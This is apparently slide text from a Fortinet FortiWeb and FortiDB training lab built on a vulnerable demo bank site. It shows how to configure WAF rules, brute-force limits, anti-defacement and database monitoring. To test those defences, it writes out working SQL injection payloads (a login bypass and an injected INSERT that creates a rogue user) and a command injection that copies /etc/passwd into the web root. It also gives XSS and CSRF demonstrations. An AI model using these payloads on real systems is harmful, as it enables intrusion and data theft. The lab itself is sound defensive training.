Prevent Information Disclosure Check Attack Log
Cross Site Scripting (XSS)
Preventing Cross Site Scripting (XSS) Discussion and Lab
Cross Site Scripting (XSS) This is a type of attack on which malicious scripts are injected into trusted sites. Most of the time the reason a site is vulnerable to this type of attack is because they dont do appropriate parameter validation Can be used to steal credentials, user and cookies information It exploits the fact that the user trusts the site
Cross Site Scripting (XSS) An example (index.php) Determining what parameter p is used for?
Cross Site Scripting (XSS) An example (index.php)

Index.php is a frameset that contains three frames: Top: topFrame.html Bottom: bottomFrame.html Main: Gets the content from the p parameter value. - By default: parameter p is feed content from login.html
Cross Site Scripting (XSS) An example (index.php)

Look what happens if you change the value of parameter p to another value?
This is just a simple example of XSS! You dont need to guess what happens when a malicious site is used instead of www.google.com?
Prevent XSS Parameter Validation > Create Rule
2. Click Create New
1. Navigate to Parameter Validation Rule
Prevent XSS Parameter Validation > Create Rule (2)

1. Name the Rule: index.php 2. Select Host Status 3. Select Host Name 4. Define the Request URL 5. Select the Action: Alert & Deny 6. Select the Severity: High 7. Click OK to save 8. Click Create New to define rule match criteria
Prevent XSS Parameter Validation > Create Rule (3)
Rule match: parameter p = login.html
1. Parameter Name: p 2. Max Length set to default value of 0 3. Select Required 4. Select Use Type Check 5. Select Argument Type = Regular Expression 6. Regular Expression = ^login.html$ 7. Click OK to save
Prevent XSS Parameter Validation > Create Policy
2. Click Create New
1. Navigate to Parameter Validation Policy
Prevent XSS Parameter Validation > Create Policy (2)

1. Name Rule: Parameter_Validation_Policy1 2. Click OK to save 3. Click Create New
4. Select defined rule(s) 5. Click OK to save
6. Final Result
Prevent XSS Parameter Validation > Apply Policy
1. Apply the Parameter Validation Policy Parameter_Validation_Policy1 to the Inline Protection Profile xbank_web_protection 2. Click OK to save
Prevent XSS Parameter Validation > Test & Check Logs
1. Navigate to http://www.xbank.com/index.php?p=http://www.google.com 2. Check to see if your GET request is blocked
Expected Block Page
Prevent XSS Parameter Validation > Check Attack Log

Navigate to Log & Report > Log Access > Attack and search for the XSS Attack you just completed
Prevent SQL Injection
Prevent SQL Injection Discussion
SQL Injection An overview of SQL

SQL (Structured Query Language). Language for managing data in DBMS (Database Management Systems) Commands are grouped in four sets:
1. Data Manipulation Language (DML): SELECT, UPDATE, INSERT, DELETE 2. Data Definition Language (DDL): CREATE, ALTER, DROP 3. Data Control Language (DCL): GRANT, REVOKE 4. Transaction Control Language (TCL): COMMIT, ROLLBACK
SQL Injection attack is about modifying SQL sentences by inserting special strings in application fields, URLs, hidden fields, etc.
SQL Injection An overview of SQL - DML

Querying the database (basic):
SELECT Field1, Field2, FROM Table1, Table2, WHERE Condition1 [and|or] Condition2 SELECT customer_fname, customer_lname FROM xbank_customer WHERE customer_id = 1
SQL Injection An overview of SQL DML (2)

Inserting a record in a database (basic):
INSERT INTO Table1 ( Field1, Field2, ) VALUES ( Value1, Value2, )
INSERT INTO xbank_customer ( customer_login, customer_password, customer_fname, customer_lname) VALUES ( mylogin, abc1234, John, Anderson)

Updating a record in a database (basic):
UPDATE Table1 SET Field1 = Value1, Field2 = Value2, WHERE Condition1 [and|or] Condition2 UPDATE xbank_customer SET customer_login = mylogin, customer_password = abc1234, customer_fname = John, customer_lname = Anderson WHERE customer_id = 1

Deleting a record from the database (basic):
DELETE FROM Table1 WHERE Condition1 [and|or] Condition2
DELETE FROM xbank_customer WHERE customer_email LIKE %@company.com or customer_login = mylogin
SQL Injection A look into verify_admin.php
SQL Injection A look into verify_admin.php (2) 1. mssql_pconnect( ): Connect to the DB Server
2. mssql_select_db( ): Select DB to use

3. mssql_query( ): Query the database 4. mssql_fetch_array( ): Read and fetch next record into an associative array 5. mssql_num_rows( ): Get the number of rows returned by a query 6. mssql_close( ): Close connection to DB Server
SQL Injection - CHALLENGE: Login to the application Try to login to the application without using any valid user or password. TIP: Youll have to inject some SQL
SQL Injection - CHALLENGE: Login to the application (2)

By injecting some SQL you can change the conditional part of the query so its always true
Login: whatever you want Password: mypassword' or 'a'='a
Take a look at the query executed by the application:

select customer_id
from
xbank_customer where customer_login = whatever you want and customer_password = mypassword or a=a ;
The part that is after the or is always true: a is always equal to a
Prevent SQL Injection Server Protection

Navigate to Web Protection > Known Attacks > Server Protection
1. Edit Known Attacks Sever_Protectionxbank 2. Enable ALL SQL Injection signatures 3. Select Alert & Deny as the action 4. Click OK to Save 5. Attempt a new SQL Injection
Prevent SQL Injection Server Protection > Test Policy

1. Navigate to http://www.xbank.com/index.php?p=login.html and attempt a new SQL injection: Login with password = mypassword' or 'a'='a 2. Check to see if your login attempt gets blocked
Prevent SQL Injection Server Protection > Review Log

Navigate to Log & Report > Log Access > Attack and search for the SQL Injection Attack you just completed
Prevent SQL Injection Summary

1. Instead of using Server Protection signatures, you could also use parameter validation to prevent SQL Injection like we did in the Cross Site Scripting lab 2. To accomplish this Edit Server Protection Rule and disable the SQL Injection signatures 3. Go to Parameter Validation Input Rule and create a new one:
Request URL: /verify_admin.php Verify parameters txtUser and txtPassword. Enforce a maximum of 8 (eight) alphanumeric characters (use regex [A-Za-z0-9])
4. Assign the new Input Rule to the already applied Parameter Validation Rule
Command Injection
Command/Code Injection Discussion
Command Injection Review Command Injection is a type of attack that benefits from vulnerable applications to execute commands in underlying operating system Its a type of a more general category called Code Injection.
Command Injection A look to verify_admin.php
exec( ) function executes an operating system command. In this case exec( ) is generating a log entries for successful and failed logins and is using the variable $log
Command Injection Executing commands

1. Disable Parameter Validation rules in xbank_web_protection 2. Since the login field value is being used by the exec( ) command without validating it first, it is possible to inject some commands there
Login: myuser; cat /etc/passwd > salida.txt ; echo Password: whatever
3. Take a look at the command executed by the application:

exec(echo 2011-05-21 15:20:10: User myuser; cat /etc/passwd > salida.txt ; echo logged in failed >> log/logins.txt
4. You just copied the content of /etc/passwd to a file in sites root directory, salida.txt
Command Injection Executing commands (2) 5. Go to the HTTP Server (Linux) an see if the file /var/www/xbank/salida.txt
Command Injection Executing commands (3) 6. Since we disabled Parameter Validation rules we can user the browser to inspect the file
http://www.xbank.com/index.php?p=salida.txt
Preventing Cross Site Resource Forgery (CSRF)
Preventing Cross Site Resource Forgery (CSRF) Discussion
Cross Site Resource Forgery (CSRF) Review

Malicious exploit of a website whereby unauthorized commands are transmitted from a user to that website Unlike cross-site scripting (XSS), which exploits the trust a user has for a particular site, CSRF exploits the trust that a site has in a user's browser OWASP Reference: https://www.owasp.org/index.php/CrossSite_Request_Forgery_(CSRF)
Cross Site Resource Forgery (CSRF) Simplified Steps

1. Alice login to www.xbank.com in order to pay her bills 2. www.xbank.com authenticates Alice and store a cookie name XBANK_AUTH in Alices browser 3. Alice logs out from the bank site and start browsing a blog 4. Trudy post an entry in the blog with an image that actually executes a withdrawal in www.xbank.com 5. When Alice click on the image, executes the action. Since www.xbank.com trusts Alice (XBANK_AUTH cookie is still valid) allows the withdrawal 6. Alice now has less money in her account.
CSRF Attacking www.xbank.com > Check balance Open your browser and go to www.xbank.com
Login to site and go to the account listing page

Check your savings accounts balance
CSRF Attacking www.xbank.com > run attack Search for the file csrf_page.html in the resource provided and double-click it
CSRF Attacking www.xbank.com > See balance delta Check your balance again
Any change?
CSRF Attacking www.xbank.com (2) 7. let's take a look to csrf_page.html
Prevent CSRF Applying business logic On way of preventing CSRF is enforcing the session to follow the application logic. For instance; to perform a withdrawal in www.xbank.com you should first go through
1. verify_admin.php
2. do_transaction.php 3. save_transaction.php
Page Access Rule functionality enforces business logic by means of a cookie, FORTIWAFSID
Prevent CSRF Applying business logic (2)
2. Create New
Notice Warning Session Management must be enabled

1. Go to Page Access Rule

1. Name Policy: page_access1 2. Click OK to save 3. Click Create New to create a new rule 4. Enable Host Status 5. Select Host from dropdown 6. Specify Match Type: RegEx 7. Add URL Pattern 8. Click OK to Save 9. Repeat for Additional URLS
Final Results of CSRF Rules Page
Prevent CSRF Applying business logic (4) 1. Edit xbank_web_protection
2. Enable Session Management

3. Select the recently created page access rule NOTE: In order to enforce business logic, the FortiWeb must be session aware. Thats why is mandatory to enable session management.
Verify Session Management is enabled
Select new Page Access Rule
Prevent CSRF Testing Configuration > Check Balance 1. Log back into www.xbank.com 2. Stay at the account listing page and review balance
Prevent CSRF Testing Configuration > Rerun attack Log back into www.xbank.com Stay at the account listing page and review balance Open your browser cookie viewer and search for the cookie FORTIWAFSID Double click csrf_page.html
Prevent CSRF Testing Configuration > Verify No change Review your balance Any change?
Prevent CSRF Testing Configuration > Check Attack Logs
Brute Force Attacks
Brute Force Attacks Discussion
Brute Force Attacks Login names and passwords always presents a challenge in application security Weak passwords is one of the most common attack vectors used to gain access to an application Dictionary attack or brute force login attacks consists of trying to guess a valid username and password combination FortiWeb offers the possibility of preventing these attacks using statistical thresholds (similar to DoS Sensors in FortiGate)
Configuring Brute Force Login Rule > Create New
2. Create New
1. Go to Brute Force Login
Notice Warning Share IP must be enabled
What is Enable Share IP

Some source IP addresses represent 1 single computer, but other source IP addresses represent 100 or 1000 computers.
Caused by Source Hide NAT
Some FWB policies provide access rate limits

A rate limit applied to 1 computer should be smaller than a rate limit applied to 500 computers Thus 2 configuration values
How does FWB determine that a multiple connections originate from more than 1 computer?
Instead of only counting hits by source IP,
It counts hits by source IP + ID Field in the IP header (non-contiguous numbers)
Configuring Brute Force Login Rule > Create New (2)
1. Name
2. Click OK to Save 3. Create New 1. Select Host Status 2. Select Host
3. Specify target page
4. Set Block Time (seconds) 5. Click OK to save
Note the page that should be monitored is verify_admin.php, but we are using login.html because it is easier to test with.
Configuring Brute Force Login Rule > Enable Share IP
2. Select Enable Share IP 1. Navigate to Share IP 3. Click Apply to save
Configuring Brute Force Login Rule > Enable Policy
1. Edit Inline Protection Profile xbank_web_protection
2. Select Brute Force Login
Configuring Brute Force Login Rule (3) Apply the Brute Force Login rule to xbank_web_protection Access http://www.xbank.com/login.html Refresh your browser as fast as you can until you get banned for 10 seconds (F5, Command + R, etc.)
Configuring Brute Force Login Rule > Review Attack Log
Auto-Learning
FortiWeb Learning Mode
FortiWeb Deployment Auto-Learning Any WAF deployment requires some knowledge of the application This adds complexity to the deployment Auto-Learning is a mode that can help during the deployment phase to create a baseline based on the behavior
Configuring Auto-Learning 1. Go to Auto Learn Auto Learn Profile Default Auto Learn Profile and create a new Inline Profile named xbank-auto
1. Go to Server Policy Policy, edit xbank_web_policy and assign

Web Protection Profile: Inline Alert Only WAF Auto Learn Profile: xbank-autoXXXXXX
Configuring Auto-Learning > Create a new Profile
2. Select Create New
1. Go to Auto Learn -> Auto Learn Profile -> Auto Learn Profile
Configuring Auto-Learning > Create a new Profile (2)
1. Name Profile
2. Specify Profile Settings
3. Click OK to save
Configuring Auto-Learning > Check Session Management
2. Edit xbank_web_protection 3. Make sure Session Management is Enabled
1. Go to Inline Protection Profile
Configuring Auto-Learning > Apply new Auto Learn Profile
2. Edit Xbank_web_policy
1. Go to Server Policy
3. Select Auto Learn Profile 3. Enable Monitoring Mode
Configuring Auto-Learning > Test WAF Auto Learn Profile 1. Access the XBANK site and navigate on it. Try to access every page, make transfers, update profile, etc. 2. Go to Auto Learn Auto Learn Report in the FortiWeb 3. Review the report automatically generated by auto-learn feature 4. Download the Report as PDF and review it 5. Note that is possible to edit and adjust some of the results 6. Generate Configuration based in the Auto-Learn report
Configuring Auto-Learning > Auto Learn Report
1. Generate Config
2. Name Profile
2. Click OK to save
Configuring Auto-Learning > Review generated configuration Pay special attention to the Parameters Validation rules
Web Defacement
Anti-Defacement Tool
Web Defacement A website defacement is an attack on a website that changes the visual appearance of the site or a webpage
FortiWeb Anti-Defacement Tool FortiWeb has a Anti-Defacement tool that recognizes when a web site file has been changed and reacts accordingly 1. Backup and creates a hash for each sites objects 2. Monitor each object comparing their hash with the ones registered 3. If any change:
Alert and manually recover changed file Automatically recover changed file
Configure Anti-Defacement Tool
2. Create New
1. Go to Web Anti-Defacement
Configure Anti-Defacement Tool > Create Policy
Name Policy
o Enable Monitoring o Define folder to monitor o Specify credentials used
for monitoring Go to Web Site with Anti-Defacement & Create New Policy
Set Monitor Intervals
Enable Auto Restore Click OK to save Test Connection
Configure Anti-Defacement Tool > Review After a while, you should see a connected status and the number of files that were backed-up
Configure Anti-Defacement Tool > Review (2) Inspect the policy details and statistics
Configure Anti-Defacement Tool > Review (3) Inspect the list protect files and attributes
Configure Anti-Defacement Tool > Review (4)

1. Edit the login.html file and change something in its content 2. Wait until you see that one file has detected as changed
3. Inspect changes by clicking on the Total Changed files number 4. Access the XBANK site and you will see the defaced site
Configure Anti-Defacement Tool (8) Review log file and verify the defacement event
FortiWeb Basic Troubleshooting
Get System Status

# get system status
Get System Performance

# get system performance
Get System Global

# get system global
System Top
# diag system top Proceso, id del Proceso, estado, Consumo de cpu Consumo de memoria Si presionas q te ordena Consumo de procesador o memoria
# diag system kill Diag system kill (id del proceso)
System Flash List

# diag system flash list
Muestra las diversas particiones y las versiones corriendo en las mismas. SE muestran cuando se actualiza el equipo por ejemplo si no se actualiza bien se puede regresar a una version anterior con la copia qeu el equipo gardo a una version posterior.
Execute Options
# execute ?
El traceroute al modificar el ping-options tambien se hace respecto al source del ping. Cuando se da de alta un fortigate o fortiweb: para evitar el tiempo de espera de registro en fortiguard utilizar: Exec-update-av exec update-ips Exec update-now El reseteo del disco de logs pide reinicio.
Execute Ping
# execute ping
Execute Traceroute
# execute traceroute
FortiWeb Advanced Troubleshooting
Diagnose Commands
CLI command trees: diagnose, get Commonly used sub-branches

diag diag diag diag network sniffer system debug application get log get sys
Numerous options/parameters viewed with ?
Diagnose Debug Flow

# diagnose debug flow filter clear diagnose debug flow policy client-ip <source_ipv4> diagnose debug flow policy direction {both | client-to-server | server-toclient} diagnose debug flow policy server-ip <destination_ipv4>
diagnose debug flow filter server-ip 2.2.128 (ip-fisica/real) diagnose debug flow show module-process-detail on diagnose debug flow trace start diagnose debug enable
Diagnose Debug Flow

We must see:
Crash Log
# diagnose debug crashlog read
Use this command to show crash logs from application proxies that have call back traces, segmentation faults, or memory register dumps, or to delete the crash log.
Diagnose Debug Application

# diagnose debug application autolearn [{-1 | 0}]
Use this command to set the verbosity level of debug logs for autolearning.

# diagnose debug application dssl [{-1 | 0}]
Use this command to set the verbosity level of debug logs for SSL inspection (temporary decryption in order to enforce policies). SSL inspection is used only when FortiWeb is operating in a mode that supports it, such as true transparent mode, transparent inspection mode, or offline protection mode.

# diagnose debug application ssl [{-1 | 0}]
Use this command to set the verbosity level of debug logging for SSL/TLS offloading. SSL offloading is supported only when the FortiWeb appliance is operating in reverse proxy mode or true transparent proxy mode.

# diagnose debug application http [{-1 | 0}]
Use this command to set the verbosity level of debug logs for the HTTP protocol parser. This parser module dissects the HTTP headers and content body for analysis by other modules such as rewriting, HTTP protocol constraints, server information disclosure, and attack signature matching.
Diagnose Network
# diagnose network tcp list
Use this command to view a list of TCP raw socket details
Diagnose Network
# diagnose network arp add <interface_name> <interface_ipv4> <mac-address_hex> # diagnose network arp delete <interface_name> <interface_ipv4> <mac-address_hex> # diagnose network arp list
Use this command to add or delete an address resolution protocol (ARP) in the internal ARP table, or to display the ARP table.
Diagnose Policy
# diagnose policy dashboard {all | list <policy_name>} # diagnose policy memory show <policy_name> # diagnose policy pserver list <policy_name> # diagnose policy session {count <policy_name> | list <policy_name>} # diagnose policy traffic show <policy_name>
Use this command to view the process ID, memory usage, live sessions, and traffic statistics associated with a server policy.
Introduction to FortiDB
Introducing FortiDB
Configuration and Vulnerability Management

Best-in-breed extensive policy driven static controls
Policy driven Controls
XL Automated process of establishing IT internal controls
DAM Database Activity Monitoring

Real-time monitoring of key users and critical transactions
Database Audit and Compliance

For Compliance and Forensic Analysis purposes
Full complement of Database Controls
Highly Scalable from SMB to Enterprise
Key Compliance Solution
FortiGuard Subscription Services

Real-Time Security Protection
Global software updates Large knowledgebase of security FortiDB Security Service subscription Hundreds of database specific signatures
Global Distributed Network

100+ threat research professionals Eight global locations Automated updates to Fortinet customers
Robust 24 x 7 x 365 Real-Time Global Intelligence
Multiple Data Collection Methods

Network sniffer
No impact on the server Zero network latency Transparent to infrastructure
FortiDB
Database Servers
Native Audit
Selective Audit, only 3-4% performance impact Does not require agents Captures 100% of events
Network Agents
2-3 % performance impact on the server (not the DB) Agents send information back to FortiDB appliances
FortiDB Family
FortiDB-400C
Targets SMB market with up to 10 Database servers
Small, Mid-Enterprise Deployments

Up to 10 DBs support HDD - 1x500GB, 1TB optional 4 x 10/100/1000 copper RJ45
FortiDB-1000C
Scalable solution for up to 60 database servers
Mid-Large Enterprise Deployments

Up to 30 DBs support HDD 1TB, 2 TB optional RAID1 4 x 10/100/1000 copper RJ45 Up to 60 DBs support HDD - 1TB, 2TB optional RAID1 Hot-swap redundant AC-Power 4 x 10/100/1000 copper RJ45
FortiDB-2000B
Enterprise deployment with redundant AC-power and support for up to 60 database servers
Large Enterprise/ Service Provider Deployments
FortiDB Software
Large Enterprise/ Service Provider Deployments

Per server CPU licensing model Windows, Linux and Solaris server OS support
For enterprise deployments with hundreds of database servers
Efficient Deployment and Management

No requirement to change network infrastructure
Designed from day one for non-intrusive deployment
FortiDB
Intuitive GUI with Centralized Policy Management

Allows for both rapid and accurate implementations
Database Servers
A single server can handle hundreds of databases

Does not require deploying multiple servers
Same solution can monitor local and geographically remote databases

No need for per data center appliance
Support for both agent based, and agent less deployment with an additional sniffer-mode option
Providing a solution for every architecture
Suited to Cloud Environments

Can monitor all databases, even in virtualized environments
FortiDB - Discovery/ Assessment

Auto Discovery of databases Sensitive data discovery
Built in policies Custom policies
Out of the box VA Policies Policy updates through FortiGuard Services Mapping to CIS, PCI benchmarks Risk levels Remediation advice Pentest module
FortiDB
FortiDB Privilege Review

What privileges and roles has each user?
Specific to each Database type Users, roles and corresponding Objects/privileges
Critical in establishing
Minimal privilege setting scheme Can be exported into reports
FortiDB
User Activity Profiling Why is it needed?

Environments consist of
Databases Many applications A lot of users Thousands of tables and objects
Environment constantly changes with differently elements being added/changed

Queries, tables, stored procedures, etc Source IPs/Apps
Admins usually do not understand how all these elements work together
Which user accesses which database What tables users access regularly Where do users come from and what tools do they use (IP, source application, etc) What is normal behavior and what is suspicious
X X
A profile/baseline must be created automatically, with constant updates in order to understand the environment Once the baseline is established it will be easy to detect Suspicious behavior
Control/ Policy Configuration

Automated policy configuration and management across the enterprise Out of the box policies DDL, DCL Privileged users/access monitoring policies Audit policies for more efficient auditing Pre-defined policies for Compliance Asset based model Hierarchal configuration allows grouping policies and databases Custom polices for data access
FortiDB
Database Activity Monitoring Alert Policies

Alert on Suspicious Activities Pre-defined policies DCLs, DDLs User Configurable policies DMLs, Select on objects Privileged Users Sessions, Users Alerts on specific conditions (can black/white list Source IP, OS Host, Source App. etc) Pre-Defined policy groups for easy configuration
Alerts Summary/Analysis
Alerts Summary Displays alerts trends Timeframes are 7, 30, 90 days and 12 months Important for understanding trends Alerts Analysis Primary focus is more detailed Analysis Grouped by :Severity, Policy, database Action, and different client information More granular view of trends
Reporting/ Compliance
Automated Compliance reports Reports with detailed drilldowns Integration with ArcSight Archive
Automation of Auditing and Compliance

Automated report generation based on COBIT:
Abnormal Use of Service Accounts Abnormal or Unauthorized Changes to Data Abnormal Termination of Database Activity History of Privilege Changes Report Verification of Audit Settings End of Period Adjustments
FortiDB Summary
Multiple Data Collection methods
Sniffer Native Audit Agents Out of the box policies for privilege users and object/schema design changes User, session and data policies allowing audit of every request Real time alerts Pre-defined audit policies Pre defined Compliance Reports Roles and Privileges reports Identifies vulnerabilities and provides remediation advice Verifies configuration Built in best practices User Activity Profiling
Auditing and Monitoring


FortiDB Value Add

Secures confidential data in databases and applications
Reporting
Database Activity Monitoring

Policy Driven conf. Data collection Real time alerts
Database Compliance
Compliance policies Compliance reports
Sensitive data discovery in databases Database Activity Monitoring with realtime alerts Vulnerability scanning with remediation advice User Activity Profiling for Baselining
Easily deploys in any environment

FortiClient Desktop
Vulnerability scan Sensitive data disc. Privilege review
Multiple data collection options Flexible policy driven configuration
Helps achieving compliance

Out of the box audit & compliance policies
Canned compliance reports
Hands On How to PoC FortiDB
Vulnerability Assessment & Management
Database Vulnerability Assessment & Management
Database Vulnerability Assessment > Create Assessment
1. Go to Assessments 2. Add
Database Vulnerability Assessment > Create Assessment
Create a new Database Assessment
Database Vulnerability Assessment > Select Target Define a Database Target
Database Vulnerability Assessment > Select Tests Select Assessment Tests (Policies)
Save
Database Vulnerability Assessment > Run Assessment Select (Check Box) & Run Assessment
Database Vulnerability Assessment > Review Results Select the Results tab and click on the Assessment Start Time to view the summary Results for each target
Database Vulnerability Assessment > View Detailed Report Select Target name to view Vulnerability Assessment Detailed Report
Database Vulnerability Assessment > Report Details
Sensitive Data Discovery
Sensitive Data Discovery
Sensitive Data Discovery Feature introduced in FortiDB 4.2
Sensitive Data Discovery allows to

scan a database and try to find any information that could be compromising Works similar to Database Vulnerability Assessment
Configuring Sensitive Data Discovery > Create New Policy Navigate to Policy > Data Discovery Policies Click Add to create a new Data Discovery Policy
Configuring Sensitive Data Discovery > CCN Policy

Create a Data Discovery Policy that will search for XBANK credit card numbers Name: XBANK_CARDS Data Pattern: (([0-9]{4}\){3})[0-9]{4} Will match four groups of four numbers, each group separated by a dash (XXXXXXXX-XXXX-XXXX) Search in actual data
Configuring Sensitive Data Discovery > PWD Policy

Create a Data Discovery Policy that will search for password columns in XBANK DB: Name: XBANK_PASSWORDS Column Name: .*pass.* Will match any column name containing the phrase pass inside: codepass, password, pass, passcode, etc. Search in metadata (column name)
Configuring Sensitive Data Discovery (4)

Create a new Data Discovery Policy Group that contains both previously created Data Discovery Policies
Configuring Sensitive Data Discovery > Select Target Navigate to Vulnerability Assessment > Sensitive Data Discovery Select Target Name = xbankapp_db to select details and apply Policy Group
Configuring Sensitive Data Discovery > Select DB Meta Select Target Details (Databases, Tables, Columns)
Configuring Sensitive Data Discovery > Select Policy Group
Navigate to Policy Group, Select xbank_group1 and Save
Configuring Sensitive Data Discovery > Run Discovery Run Data Discovery Select Target xbankapp_db and Start Scan Observe progress under Last Discovery column
Configuring Sensitive Data Discovery > Discovery Results After starting the Data Discovery Observe the results under the Last Discovery column Click the results link to view the Detailed Report
Configuring Sensitive Data Discovery > Preview Report Preview Report Details
Configuring Sensitive Data Discovery
1. Go Data Discovery Policies
2. Add

Create a Data Discovery Policy that will search for XBANK credit card numbers Name: XBANK_CARDS Data Pattern: (([0-9]{4}\){3})[0-9]{4} Will match four groups of four numbers, each group separated by a dash (XXXXXXXX-XXXX-XXXX) Search in actual data

Create a Data Discovery Policy that will search for password columns in XBANK DB: Name: XBANK_PASSWORDS Column Name: .*pass.* Will match any column name containing the phrase pass inside: codepass, password, pass, passcode, etc. Search in metadata (column name)

Create a Data Discovery Policy Group that contains both previously created policies
2. Add
1. Go Data Discovery Policy Groups
2. Click on xbankapp_db 1. Go to Sensitive Data Discovery
1. Highlight database
2. Highlight tables to scan and use the arrow to mark them as selected
1. Select created Data Discovery Policy Group
Configuring Sensitive Data Discovery (8) 1. Once the Sensitive Data Discovery is configured you can run it and wait until the scan finishes 2. After that, review results and see if it found something
DAM Policies
Creating Custom DAM Policies
1. Go to Policies DAM Policies
2. Add a new Table Policy that generate an event when someone different from dbo reads or writes into dbo.spt_values table
3. Create a custom DAM Policy Group and add created policy as member 4. Assign the new Policy Group to the MSSQL monitor 5. Configure and Start monitor 6. Generate events 7. See results
Creating Custom DAM Policies (cont.)
Creating Custom DAM Policy Group
Configure Database Monitor in MS SQL Server DB
Create an Alert Group

1. Create a new Alert Group
Name: MS-SQL Alerts Filter: Database Type = Microsoft SQL Server
2. Go to the Alerts Pane 3. Select recently created group. You shouldnt see any alert
Generating Events in MS SQL Server

1. Connect with sa to database using Microsoft SQL Server Management Studio 2. Create a new query and run:
SELECT * FROM dbo.spt_values ;
3. Review and discuss results
Generating Events in MS SQL Server (cont.)
Have you got any alert? Why?

1. Create a new SQL Server login: badguy 2. Create a new master database user based on badguy login 3. Re-connect to SQL Server using badguy
4. Run the query once more

5. Review results
SQL Injection

Querying the database (basic):
SELECT Field1, Field2, FROM Table1, Table2, WHERE Condition1 [and|or] Condition2 SELECT customer_fname, customer_lname FROM xbank_customer WHERE customer_id = 1

Inserting a record in a database (basic):
INSERT INTO Table1 ( Field1, Field2, ) VALUES ( Value1, Value2, )
INSERT INTO xbank_customer ( customer_login, customer_password, customer_fname, customer_lname) VALUES ( mylogin, abc1234, John, Anderson)

Updating a record in a database (basic):
UPDATE Table1 SET Field1 = Value1, Field2 = Value2, WHERE Condition1 [and|or] Condition2 UPDATE xbank_customer SET customer_login = mylogin, customer_password = abc1234, customer_fname = John, customer_lname = Anderson WHERE customer_id = 1
SQL Injection A look into verify_admin.php
SQL Injection - CHALLENGE: Login to the application Try to login to the application without using any valid user or password. TIP: Youll have to inject some SQL
SQL Injection : Login to the application

By injecting some SQL you can change the conditional part of the query so its always true
Login: whatever you want Password: mypassword' or 'a'='a

select customer_id
from
xbank_customer where customer_login = whatever you want and customer_password = mypassword or a=a ;
The part that is after the or is always true: a is always equal to a
SQL Injection Creating a new user Besides modifying the condition, we can benefit from the ; to actually create a new user in the database Before showing how to create a new user by injecting code, let's configure the FortiDB to alert when the application launch an INSERT. The XBANK application should NEVER execute an INSERT or DELETE in xbank_customer table.
SQL Injection Creating a new user (2)
2. Policies
1. Go to Monitors and edit xbankapp_db
3. Add a new Table policy
1. Name
2. Select DB 3. Select Schema
4. Select xbank_cutomer table only for write action

1. Enable Suspicious Login Name
2. Add user app_user
3. Save
1. Click Restart to update monitor configuration

Things can be even worse. You could insert a customer into the database.
Login: whatever you want Password: a' ; insert into xbank_customer (customer_login, customer_password) values ('imbad','1234') ;
select * from xbank_customer where customer_login = 'a

select customer_id from xbank_customer where customer_login = whatever you want and
customer_password = a' ; insert into xbank_customer (customer_login, customer_password) values ('imbad,'1234') ; select * from xbank_customer where customer_login = a ;
Login to the application using imbad as login name and 1234 as password. Voil!
1. Go to Alerts and review if an alert was generated
FortiDB Basic Troubleshooting
FortiDB System Dashboard
DB Activity Monitoring Details
DB Activity Monitoring Log
Local Audit Trail
Enable it at: Administration > Global Configuration
FortiDB Licence Information
Testing Database Connections
If something goes wrong, you will see details of the connection problem
Monitoring Check
Monitoring Management Status Icon
Monitoring Management Start / Stop Monitoring
System Resources
FortiDB Appliances have a System Resources option at the GUI
The System Resources section displays usage of the FortiDB unit's resources, including CPU, memory (RAM) and hard disk.
CPU Usage: The current status of CPU usage. This field displays CPU usage for core processes only. CPU usage for management processes (for example, for HTTPS connections to the web-based manager) is excluded. Memory Usage: The current status of memory usage. This field displays memory usage for core processes only. Memory usage for management processes (for example, for HTTPS connections to the web-based manager) is excluded. Hard Disk Usage: The current status of hard disk usage. This field displays the amount of hard disk space used.
Execute Ping
The execute ping command allows you to send an ICMP echo request (ping) to test the network connection between the FortiDB system and another network device.
Syntax:execute ping {<ip> | <hostname>}
Sample command : execute ping 192.168.1.23
Execute Traceroute
The execute traceroute command allows you to test the connection between the FortiDB system and another network device, and display information about the network hops between the device and the FortiDB system.
Syntax:execute traceroute {<address_ipv4> | <host-name>}
Sample command : execute traceroute <your_IPaddress>
Config System Interface

Works in the same way than Fortigate The config system interface command allows you to edit the configuration of a FortiDB network interface. Sample Command: .
config system interface edit port1 set allowaccess ping https ssh set ip 192.168.100.159 255.255.255.0 set status up end
Config System Route

The config system route command allows you to view or configure static routing table entries. Syntax:
config system route edit <seq_num> set device <port> set dst <dst_ip_mask> set gateway <gw_ip> end
FortiDB Advanced Troubleshooting
Backing Up your Configuration

You will need an FTP server to back up the current configuration from the CLI. Log into the CLI. Enter the following command to back up your local database, systemconfiguration settings, archives and reports:
execute backup all-settings <ftp server> <filepath> <username> <password> [cryptpasswd]
Restoring your Configuration

Log into the CLI.
Enter the following command to copy the backup configuration settings to restore the file on the FortiDB unit:
execute restore all-settings <ftp server> <filepath> <username> <password> [crptpasswd]
Note: This operation will replace your current settings and necessitate a reboot.
Execute backup-remove fd-archive

This FortiDB CLI allows you to backup and then remove your archives. Syntax: execute backup-remove fd-archive <before-date> <ftp server> <username> <password> [directory][filename]
where: <before-date> Date of the last archive you want included in your backup. The format is YYYY-MM-DD (MM(1-12), DD(1-31)).YYYY is a 4-digit number representing the year.
<ftp server> IP address or hostname of FTP server. <username>User name of account that logs on to the FTP server. <password>Password of account that logs on to the FTP server. [directory]Location on FTP server where you want the tar file to be placed. [filename]Name for the tar file on the FTP server where you want the archives to be placed. The default file name is FD-ARCHIVE-<before-date>.tar. Sample command: execute backup-remove fd-archive 2008-07-30 <your_ftp_server> <your_ftp_username> <your_ftp_password> . myArchives.tar
Execute backup-remove fd-report

This FortiDB CLI allows you to backup and then remove your reports. Syntax: execute backup-remove fd-report <before-date> <ftp server> <username> <password> [directory][filename]
where: <before-date> Date of the reports you want included in your backup. The format is YYYY-MM-DD (MM(1-12), DD(1-31)).YYYY is a 4-digit number representing the year.
<ftp server> IP address or hostname of FTP server. <username>User name of account that logs on to the FTP server. <password>Password of account that logs on to the FTP server. [directory]Location on FTP server where you want the tar file to be placed. [filename]Name for the tar file on the FTP server where you want the archives to be placed. The default file name is The default file name is FD-REPORT-<before-date>.tar. Sample command: execute backup-remove fd-report 2008-07-30 <your_ftp_server> <your_ftp_username> <your_ftp_password> . myReports.tar
Diagnose Command
